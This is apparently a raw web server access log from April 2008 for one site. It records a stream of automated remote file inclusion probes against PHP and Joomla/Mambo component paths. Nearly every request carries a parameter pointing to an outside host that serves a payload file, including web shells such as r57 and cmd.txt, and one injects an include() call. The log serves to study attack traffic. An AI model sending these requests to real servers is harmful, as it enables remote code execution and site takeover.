202.60.77.241 - - [07/Apr/2008:10:51:43 -0700] "GET /include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:51:43 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:10:51:48 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:10:51:49 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.226.60.4 - - [07/Apr/2008:10:51:51 -0700] "GET /logs/access_071229.log//components/com_minibb.php?absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:10:51:54 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:10:51:54 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.226.60.4 - - [07/Apr/2008:10:52:00 -0700] "GET //components/com_minibb.php?absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.226.60.4 - - [07/Apr/2008:10:52:03 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:10:52:16 -0700] "GET /logs/access_080223.log//errors.php?error=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:10:52:16 -0700] "GET //errors.php?error=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:10:52:16 -0700] "GET /logs//errors.php?error=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.205.224.40 - - [07/Apr/2008:10:52:26 -0700] "GET /logs/access_080313.loghttp://spartanteam.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts-MyWay; (R1 1.3); .NET CLR 1.1.4322)" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:10:52:36 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/kiansantang/Tools/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:10:53:02 -0700] "GET /logs/access_080218.log//errors.php?error=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.175.137.162 - - [07/Apr/2008:10:53:10 -0700] "GET /logs/access_080329.log/index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.205.224.40 - - [07/Apr/2008:10:53:13 -0700] "GET /logs/access.loghttp://spartanteam.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.5) Gecko/20031021" "www.dmulk.com"
77.221.130.3 - - [07/Apr/2008:10:53:13 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.26.137.64 - - [07/Apr/2008:10:53:21 -0700] "GET //html&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
58.26.137.64 - - [07/Apr/2008:10:53:30 -0700] "GET /logs//html&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
118.127.2.108 - - [07/Apr/2008:10:53:34 -0700] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.firerunners.nl//test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
118.127.2.108 - - [07/Apr/2008:10:53:34 -0700] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.firerunners.nl//test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
69.72.172.10 - - [07/Apr/2008:10:53:47 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nad.nad.hostagig.com/.../data/456.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:10:53:47 -0700] "GET /logs/access_071231.log HTTP/1.0" 200 225555 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.72.172.10 - - [07/Apr/2008:10:53:52 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nad.nad.hostagig.com/.../data/456.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.172.10 - - [07/Apr/2008:10:53:52 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nad.nad.hostagig.com/.../data/456.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.172.10 - - [07/Apr/2008:10:53:52 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nad.nad.hostagig.com/.../data/456.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.226.60.4 - - [07/Apr/2008:10:54:28 -0700] "GET /logs/access_080218.log//components/com_minibb.php?absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:10:54:29 -0700] "GET /logs/access_080106.log//advguestbook/admin.php?include_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:10:54:30 -0700] "GET //advguestbook/admin.php?include_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:10:54:30 -0700] "GET /logs//advguestbook/admin.php?include_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.146.4.147 - - [07/Apr/2008:10:54:59 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [07/Apr/2008:10:55:04 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mynewsassistant.com/sendstudio/archive/49/226/attachments/key.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.55.6.34 - - [07/Apr/2008:10:55:05 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mynewsassistant.com/sendstudio/archive/49/226/attachments/key.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.55.6.34 - - [07/Apr/2008:10:55:06 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mynewsassistant.com/sendstudio/archive/49/226/attachments/key.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.173.42 - - [07/Apr/2008:10:55:19 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://usil.us/tcl/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.173.42 - - [07/Apr/2008:10:55:19 -0700] "GET //main.php?sayfa=http://usil.us/tcl/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.173.42 - - [07/Apr/2008:10:55:19 -0700] "GET /logs//main.php?sayfa=http://usil.us/tcl/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.173.42 - - [07/Apr/2008:10:55:40 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://usil.us/tcl/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:10:55:54 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:10:55:54 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:10:55:55 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:10:55:59 -0700] "GET /logs/access_080225.log/index.php?sayfa=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [07/Apr/2008:10:56:03 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [07/Apr/2008:10:56:05 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.221.90 - - [07/Apr/2008:10:56:14 -0700] "GET /index.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
195.34.78.106 - - [07/Apr/2008:10:56:15 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:10:56:17 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.34.78.106 - - [07/Apr/2008:10:56:21 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:10:56:36 -0700] "GET //admin/autoclose.php?subd=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:10:56:36 -0700] "GET /logs/access_080123.log//advguestbook/admin.php?include_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:10:56:37 -0700] "GET /logs//admin/autoclose.php?subd=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
195.137.42.35 - - [07/Apr/2008:10:56:51 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.indicce.com/admin/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.226.60.4 - - [07/Apr/2008:10:57:07 -0700] "GET //components/com_minibb.php?absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.162.147.212 - - [07/Apr/2008:10:57:11 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.162.147.212 - - [07/Apr/2008:10:57:11 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.162.147.212 - - [07/Apr/2008:10:57:11 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.198.112 - - [07/Apr/2008:10:57:19 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.suttas.com/files/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:10:57:20 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:10:57:33 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:10:57:34 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:10:57:34 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:10:57:59 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://h1.ripway.com/raru/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:10:57:59 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://h1.ripway.com/raru/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:10:58:00 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://h1.ripway.com/raru/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.127.2.108 - - [07/Apr/2008:10:58:05 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.117.113 - - [07/Apr/2008:10:58:23 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
118.127.2.108 - - [07/Apr/2008:10:58:31 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
118.127.2.108 - - [07/Apr/2008:10:58:32 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.162.147.212 - - [07/Apr/2008:10:58:32 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
118.127.2.108 - - [07/Apr/2008:10:58:32 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.147.8.6 - - [07/Apr/2008:10:58:38 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.147.8.6 - - [07/Apr/2008:10:58:39 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.147.8.6 - - [07/Apr/2008:10:58:39 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.147.8.6 - - [07/Apr/2008:10:58:40 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.22.204.88 - - [07/Apr/2008:10:58:46 -0700] "GET /logs/access_080313.log/index1.php?x=http://scanbax.we.bs/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.88 - - [07/Apr/2008:10:58:46 -0700] "GET /index1.php?x=http://scanbax.we.bs/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.88 - - [07/Apr/2008:10:58:46 -0700] "GET /logs/index1.php?x=http://scanbax.we.bs/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:10:58:55 -0700] "GET /logs/access_080216.log/main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:10:58:56 -0700] "GET /main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [07/Apr/2008:10:58:57 -0700] "GET /logs/main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.31.8.70 - - [07/Apr/2008:10:58:58 -0700] "GET /logs/access_080308.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.31.8.70 - - [07/Apr/2008:10:58:58 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.31.8.70 - - [07/Apr/2008:10:58:59 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.88 - - [07/Apr/2008:10:59:14 -0700] "GET /logs/access_080306.log/index1.php?x=http://scanbax.we.bs/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
118.127.2.108 - - [07/Apr/2008:10:59:22 -0700] "GET /logs/access_080312.log//admin/business_inc/saveserver.php?thisdir=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
118.127.2.108 - - [07/Apr/2008:10:59:46 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.firerunners.nl//test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
118.127.2.108 - - [07/Apr/2008:10:59:46 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.firerunners.nl//test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
194.112.190.5 - - [07/Apr/2008:10:59:49 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.112.190.5 - - [07/Apr/2008:10:59:50 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.112.190.5 - - [07/Apr/2008:10:59:50 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.112.190.5 - - [07/Apr/2008:10:59:50 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.112.190.5 - - [07/Apr/2008:10:59:50 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.112.190.5 - - [07/Apr/2008:10:59:50 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.112.190.5 - - [07/Apr/2008:10:59:51 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.112.190.5 - - [07/Apr/2008:10:59:51 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.31.8.70 - - [07/Apr/2008:10:59:54 -0700] "GET /logs/access_080312.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:59:58 -0700] "GET /include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
202.60.77.241 - - [07/Apr/2008:10:59:59 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
140.127.139.248 - - [07/Apr/2008:11:00:02 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.127.139.248 - - [07/Apr/2008:11:00:03 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.127.139.248 - - [07/Apr/2008:11:00:05 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.127.139.248 - - [07/Apr/2008:11:00:05 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:11:00:13 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.249.105.111 - - [07/Apr/2008:11:00:18 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://h1.ripway.com/raru/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.220.207.62 - - [07/Apr/2008:11:00:31 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.207.62 - - [07/Apr/2008:11:00:33 -0700] "GET //index.php?option=com_custompages&cpage=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.207.62 - - [07/Apr/2008:11:00:34 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:11:00:35 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:11:00:37 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:11:00:38 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.55.6.34 - - [07/Apr/2008:11:00:38 -0700] "GET /logs/access_080329.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mynewsassistant.com/sendstudio/archive/49/226/attachments/key.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:11:00:48 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:11:00:48 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.246.58.23 - - [07/Apr/2008:11:00:55 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.179.180.53 - - [07/Apr/2008:11:01:25 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "www.dmulk.com"
202.179.180.53 - - [07/Apr/2008:11:01:27 -0700] "GET / HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "www.dmulk.com"
